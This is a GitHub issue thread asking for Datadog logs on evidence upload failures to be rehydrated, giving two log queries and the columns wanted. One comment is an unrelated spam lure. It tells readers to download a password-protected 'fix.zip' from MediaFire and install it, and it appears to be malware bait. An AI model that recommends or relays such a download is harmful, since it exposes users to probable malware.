### ISSUE TITLE
Evidence Upload Silent Failure – Rehydrate Datadog logs prior to 5/9/23

### ISSUE THREAD

**Issue by freeheeling** [department-of-veterans-affairs/va.gov-team#91478]
Rehydrate Datadog logs prior to 5/9/2023 to as far back as available (August 2022 – May 8, 2023).

#### Queries:
1. **retryable_error**
```
@application:vets-api-worker @environment:production @named_tags.class:"EVSS::DisabilityCompensationForm::SubmitUploads" @payload.status:retryable_error 
```
2. **success**
```
@application:vets-api-worker @environment:production @named_tags.class:"EVSS::DisabilityCompensationForm::SubmitUploads" @payload.status:success 
```

In addition to the date and content, include each log's payload error_message, submission_id, saved_claim_id, and job_id as table columns.

Follow steps in https://github.com/department-of-veterans-affairs/va.gov-team-sensitive/blob/master/teams/benefits/investigations/2024-07-31-evidence-upload-silent-failures.md#methodology to process and filter desired logs.

If possible, use subqueries within Datadog to filter any 'retryable_error' logs with a corresponding 'success' log, represented by a matched job_id, thus eliminating the need to filter ultimate 'retryable_error' event successes.

**Comment by mabhi02** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by lisacapaccioli** [comment]
No longer applicable as the team found another way to do this.
